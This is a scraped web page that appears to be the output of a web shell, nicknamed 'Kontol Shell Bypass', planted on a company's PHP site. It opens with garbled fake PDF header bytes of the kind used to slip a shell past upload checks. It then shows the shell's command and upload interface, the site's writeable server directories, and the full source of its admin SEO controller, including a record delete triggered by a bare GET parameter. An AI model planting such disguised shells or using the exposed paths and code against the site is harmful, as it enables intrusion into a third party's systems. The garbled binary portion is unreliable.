%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardacorporation.net/application/modules/admin/controllers/pageseo/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardacorporation.net/application/modules/admin/controllers/pageseo/Pageseo.php
<?php
/*
* @Author:    Sharda Tech Pvt. Ltd.
*/
if (!defined('BASEPATH')) {
    exit('No direct script access allowed');
}

class Pageseo extends ADMIN_Controller
{

    public function __construct()
    {
        parent::__construct();
        $this->load->model('Common_model');
    }

    public function index()
    {
        $this->login_check();
		
		if (isset($_GET['delete'])) {
		    $this->Common_model->deleteRecords('su_seo_pages',$_GET['delete']);
            $this->session->set_flashdata('result_delete', 'Record is deleted!');
            redirect('admin/pageseo');
        }
		
        $data = array();
        $head = array();
        $head['title'] = 'Administration - Manage SEO';
        $head['description'] = '!';
        $head['keywords'] = '';
		
		// Validate the form
		$this->form_validation->set_rules('title', 'Title', 'trim|required');
		$this->form_validation->set_rules('keywords', 'Keyword', 'trim|required');
		$this->form_validation->set_rules('description', 'description', 'trim|required');
		$this->form_validation->set_rules('status', 'Status', 'trim|required');
       
		if ($this->form_validation->run($this)) {
			$_POST['title'] = seo_friendly_url($_POST['title']);
			$_POST['description'] = seo_friendly_url($_POST['description']);
		    $this->Common_model->setRecords($_POST, 'su_seo_pages');
            $this->saveHistory('upload new record  - ' . $_POST['title']);
            redirect('admin/pageseo');
        }
		
		if(isset($_GET['edit'])) {
            $_POST = $this->Common_model->getRecords($_GET['edit'],'su_seo_pages');
        }
		// Get All SU Banners
		$data['overviewDetails'] = $this->Common_model->getRecords(NULL, 'su_seo_pages');
		
        $this->load->view('_parts/header', $head);
        $this->load->view('pageseo/pageseo', $data);
        $this->load->view('_parts/footer');
        $this->saveHistory('Go to Admin Pageseo');
    }
	
}

Kontol Shell Bypass